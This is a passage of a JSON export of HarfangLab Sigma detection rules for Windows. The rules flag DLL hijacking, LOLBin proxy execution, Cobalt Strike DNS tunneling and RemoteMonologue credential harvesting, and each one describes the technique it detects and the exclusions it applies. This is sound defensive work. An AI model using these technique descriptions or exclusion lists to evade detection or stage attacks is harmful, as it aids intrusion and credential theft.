"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087993Z",
"creation_date": "2026-03-23T11:45:34.087995Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087999Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/egre55/status/1052907871749459968",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_syntpenh_spawning_processes.yml",
"content": "title: Process Spawned by SynTPEnh.exe\nid: 6917420f-8cf8-42ed-b237-e6035a048408\ndescription: |\n Detects suspicious processes started from the legitimate Synaptics touchpad driver binary SynTPEnh.exe (bundled with many OEM laptops, such as Lenovo and Dell models) in order to proxy execution and evade defenses.\n This binary can be used as a LOLBin in order to proxy the execution of other binaries; the rule keys on a parent command line carrying the SHELLEXEC switch and only filters out the known Synaptics, Lenovo and Dell touchpad helpers, so any other child process is treated as suspicious.\n It is recommended to investigate the legitimacy of the process responsible for the execution of SynTPEnh.exe and to analyze child processes.\nreferences:\n - https://twitter.com/egre55/status/1052907871749459968\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/05/17\nmodified: 2025/10/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_image:\n - ParentImage|endswith: '\\SynTPEnh.exe'\n - ProcessParentOriginalFileName: 'SynTPEnh.exe'\n\n selection_commandline:\n ParentCommandLine|contains: ' ?SHELLEXEC '\n\n filter_legitimate:\n Image:\n - '?:\\Windows\\System32\\SynTPEnh.exe'\n - '?:\\Windows\\System32\\SynTPHelper.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynTPLpr.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynTPHelper.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\SynLenovoHelper.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\DellTpad.exe'\n - '?:\\Program Files\\Synaptics\\SynTP\\DellTouchpad.exe'\n\n exclusion_werfault:\n Image: '?:\\Windows\\System32\\WerFault.exe'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6917420f-8cf8-42ed-b237-e6035a048408",
"rule_name": "Process Spawned by SynTPEnh.exe",
"rule_description": "Detects suspicious processes started from the legitimate Synaptics touchpad driver binary SynTPEnh.exe (bundled with many OEM laptops, such as Lenovo and Dell models) in order to proxy execution and evade defenses.\nThis binary can be used as a LOLBin in order to proxy the execution of other binaries; the rule keys on a parent command line carrying the SHELLEXEC switch and only filters out the known Synaptics, Lenovo and Dell touchpad helpers, so any other child process is treated as suspicious.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of SynTPEnh.exe and to analyze child processes.\n",
"rule_creation_date": "2022-05-17",
"rule_modified_date": "2025-10-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69250942-f254-440e-a301-7ce05a297557",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081651Z",
"creation_date": "2026-03-23T11:45:34.081653Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081657Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qrtfi.yml",
"content": "title: DLL Hijacking via qrtfix.exe\nid: 69250942-f254-440e-a301-7ce05a297557\ndescription: |\n Detects potential Windows DLL Hijacking via qrtfix.exe (the original file name matched by this rule) loading qrt.dll from a location other than the F-Secure Anti-Virus installation directories that the rule filters out.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qrtfix.exe'\n ImageLoaded|endswith: '\\qrt.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\F-Secure\\Anti-Virus\\'\n - '?:\\Program Files\\F-Secure\\Anti-Virus\\'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "69250942-f254-440e-a301-7ce05a297557",
"rule_name": "DLL Hijacking via qrtf.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qrtf.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6937271c-260b-4e5b-b615-ac15220e5645",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082211Z",
"creation_date": "2026-03-23T11:45:34.082213Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082217Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_browserexport.yml",
"content": "title: DLL Hijacking via browserexport.exe\nid: 6937271c-260b-4e5b-b615-ac15220e5645\ndescription: |\n Detects potential Windows DLL Hijacking via browserexport.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'browserexport.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\msiso.dll'\n - '\\wininet.dll'\n - '\\winsqlite3.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6937271c-260b-4e5b-b615-ac15220e5645",
"rule_name": "DLL Hijacking via browserexport.exe",
"rule_description": "Detects potential Windows DLL Hijacking via browserexport.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6939eb2f-40f8-42c0-95f5-b4e8026e51e3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083008Z",
"creation_date": "2026-03-23T11:45:34.083010Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/cyb3rops/status/994534209631944704",
"https://attack.mitre.org/techniques/T1071/004/"
],
"name": "t1071_004_cobalt_strike_dns_tunneling.yml",
"content": "title: Cobalt Strike DNS Tunneling\nid: 6939eb2f-40f8-42c0-95f5-b4e8026e51e3\ndescription: |\n Detects suspicious DNS query patterns associated with Cobalt Strike DNS tunneling.\n Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\n Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n It is recommended to analyze the process responsible for the DNS request to determine whether it is indeed a Cobalt Strike beacon and to isolate infected hosts if necessary.\nreferences:\n - https://twitter.com/cyb3rops/status/994534209631944704\n - https://attack.mitre.org/techniques/T1071/004/\ndate: 2023/03/23\nmodified: 2025/04/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Framework.CobaltStrike\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName: '???.stage.*.*'\n QueryStatusCategory: 'success'\n\n exclusion_prefixes:\n QueryName|startswith:\n - 'www.'\n - 'api.'\n - 'app.'\n\n exclusion_legitimate:\n QueryName:\n # Blacknoise is an attack framework simulation that legitimately uses this domain\n - 'app.stage.blacknoise.co'\n - 'get.stage.adobe.com'\n - 'img.stage.creative.com'\n - 'don.stage.greenpeace.fr'\n - '???.stage.elips-solution.fr*'\n - 'rum.stage.haystack.es'\n - 's3n.stage.cashify.in'\n - 'cms.stage.europapark.de'\n - '*.stage.honeywell.com'\n - 'hms.stage.meininger-hotels.com'\n - 'ocp.stage.walmart.com'\n - 'cpa.stage.vizientinc.com'\n - 'vfm.stage.velco.bike'\n - 'cbr.stage.fsapps.ca'\n - 'cdn.stage.tourradar.com'\n - 'upg.stage.plusgrade.com'\n\n condition: 
selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6939eb2f-40f8-42c0-95f5-b4e8026e51e3",
"rule_name": "Cobalt Strike DNS Tunneling",
"rule_description": "Detects suspicious DNS query patterns associated with Cobalt Strike DNS tunneling.\nAdversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\nIt is recommended to analyze the process responsible for the DNS request to determine whether it is indeed a Cobalt Strike beacon and to isolate infected hosts if necessary.\n",
"rule_creation_date": "2023-03-23",
"rule_modified_date": "2025-04-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "693f999d-5ae3-4651-ac76-03a163015af9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080855Z",
"creation_date": "2026-03-23T11:45:34.080857Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080862Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate_ssp.yml",
"content": "title: DLL Hijacking via rmactivate_ssp.exe\nid: 693f999d-5ae3-4651-ac76-03a163015af9\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate_ssp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate_ssp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\cryptsp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "693f999d-5ae3-4651-ac76-03a163015af9",
"rule_name": "DLL Hijacking via rmactivate_ssp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate_ssp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6949760c-fa90-4519-9761-a914b1c49414",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589762Z",
"creation_date": "2026-03-23T11:45:34.589766Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589778Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_openfiles.yml",
"content": "title: DLL Hijacking via openfiles.exe\nid: 6949760c-fa90-4519-9761-a914b1c49414\ndescription: |\n Detects potential Windows DLL Hijacking via openfiles.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'openfiles.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6949760c-fa90-4519-9761-a914b1c49414",
"rule_name": "DLL Hijacking via openfiles.exe",
"rule_description": "Detects potential Windows DLL Hijacking via openfiles.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6961dfa8-1eda-47fe-98ee-2eb179e41bb3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095356Z",
"creation_date": "2026-03-23T11:45:34.095358Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095363Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/RemoteMonologue/",
"https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions",
"https://github.com/xforcered/RemoteMonologue",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "t1187_remote_monologue.yml",
"content": "title: Credential Harvesting via Remote Monologue Detected\nid: 6961dfa8-1eda-47fe-98ee-2eb179e41bb3\ndescription: |\n Detects a registry modification related to the RemoteMonologue attack technique setup.\n RemoteMonologue is a Windows credential harvesting technique that enables remote user compromise by leveraging the Interactive User RunAs key and coercing NTLM authentications via DCOM.\n It is recommended to check the source user and workstation of the modification for any suspicious activities with the help of the session information card in the security event.\nreferences:\n - https://github.com/xforcered/RemoteMonologue/\n - https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions\n - https://github.com/xforcered/RemoteMonologue\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/04/09\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1187\n - attack.defense_evasion\n - attack.persistence\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.RemoteMonologue\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject|startswith: 'HKCR\\AppID\\{????-????-????-????-????????????}\\RunAs'\n Details: 'Interactive User'\n Image: '?:\\windows\\system32\\svchost.exe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6961dfa8-1eda-47fe-98ee-2eb179e41bb3",
"rule_name": "Credential Harvesting via Remote Monologue Detected",
"rule_description": "Detects a registry modification related to the RemoteMonologue attack technique setup.\nRemoteMonologue is a Windows credential harvesting technique that enables remote user compromise by leveraging the Interactive User RunAs key and coercing NTLM authentications via DCOM.\nIt is recommended to check the source user and workstation of the modification for any suspicious activities with the help of the session information card in the security event.\n",
"rule_creation_date": "2025-04-09",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1187"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "69751146-8ab0-4b09-9bef-03ed928fc3f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071829Z",
"creation_date": "2026-03-23T11:45:34.071831Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071836Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_load_dll_by_ordinal.yml",
"content": "title: Suspicious DLL Loaded by Ordinal\nid: 69751146-8ab0-4b09-9bef-03ed928fc3f5\ndescription: |\n Detects a suspicious execution of \"Rundll32.exe\" to load a DLL by specifying the function using an ordinal instead of a function name.\n This can be used by an attackers to evade command-line based detection.\n It is recommended to investigate the DLL loaded by \"Rundll32.exe\" as well as the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/03/16\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Rundll32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_binary:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n selection_ordinal:\n CommandLine|contains:\n - ' #'\n - ',#'\n - ', #'\n\n # Exclude cases where you have a '#' in one the arguments of the DLL call e.g.:\n # C:\\Windows\\System32\\rundll32.exe shell32.dll, ShellExec_RunDLL C:\\Users\\USER\\Documents\\Tartine #6.pdf\n exclusion_hashtag_filename:\n CommandLine|re: '(?i).*rundll32\\.exe\\s.+\\.dll,\\s{0,1}[^#]+\\s.*#[0-9]+.*'\n\n exclusion_edgehtml:\n CommandLine: '*:\\WINDOWS\\SYSTEM32\\EDGEHTML.dll*'\n CommandLine|contains:\n - ',#125'\n - ',#133'\n - ',#140'\n - ',#141'\n\n exclusion_known_fp:\n CommandLine:\n - '?:\\WINDOWS\\SysWOW64\\rundll32.exe ?:\\WINDOWS\\SysWOW64\\shell32.dll,#44 ?:\\Program Files (x86)\\Contour Pointing Devices\\ContourMouse.cpl,'\n - '?:\\windows\\system32\\rundll32.exe ?:\\windows\\system32\\shell32.dll,Control_RunDLL ?:\\windows\\SysWOW64\\javacpl.cpl,Java'\n - 'rundll32.exe V0230Cvw.dll,ctCVWConsoleRunDLL32EP Live! 
